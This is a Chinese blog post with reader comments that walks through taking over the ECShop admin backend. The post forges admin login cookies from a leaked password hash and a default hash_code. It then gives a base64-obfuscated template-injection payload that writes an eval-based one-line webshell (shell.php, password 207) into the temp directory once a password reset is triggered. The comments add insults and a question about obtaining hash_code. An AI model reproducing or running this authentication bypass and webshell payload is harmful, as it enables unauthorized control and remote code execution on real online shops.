ecshop后台shell技术分享
之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。
用户密码 admin:d03a7617433c2826976062fec569a434
ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93
那就用之前的admin的密码和hash_code的 放在一起再一次MD5
md5(d03a7617433c2826976062fec569a43431693422540744c0a6b6da635b7a5a93 )=76bb7b55d4d0b8283fd4c01994bce575
这个时候 用可以修改COOKIE的浏览器。修改cookie为
ECSCP[admin_id]=1; ECSCP[admin_pass]=76bb7b55d4d0b8283fd4c01994bce575;ECSCP_ID=b5a19c09952c8d1b09a97a89f48df8d1575f1dd1
后面这个ECSCP_ID随意, 然后访问后台,就可以进去了。反正我是成功了N次,不懂你们。
{$user_name'];file_put_contents(base64_decode('Li4vdGVtcC9zaGVsbC5waHA='),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4='));echo $var['$user_name} <p>{$user_name}您好!<br /> <br /> 您已经进行了密码重置的操作,请点击以下链接(或者复制到您的浏览器):<br /> <br /> <atarget ="_blank"href="{$reset_email}">{$reset_email}<br /> <br /> 以确认您的新密码重置操作!<br /> <br /> {$shop_name}<br /> {$send_date}</atarget></p>
在后台登陆地方点忘记密码,输入用户和邮箱 提交就会在temp下生成shell.php一句话木马,密码是207
Li4vdGVtcC9zaGVsbC5waHA= 用base64解密就是 ../temp/shell.php
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4408.html
k8博客上早有了,早搞过了
@冰梦, 那你来干嘛?这个网站我认为比K8好多了,写得很详细
@冰梦, 你就是一傻逼
@hack, 发错了
怎么才能获得目标站的hach_code,md5密码知道
搞过了 支持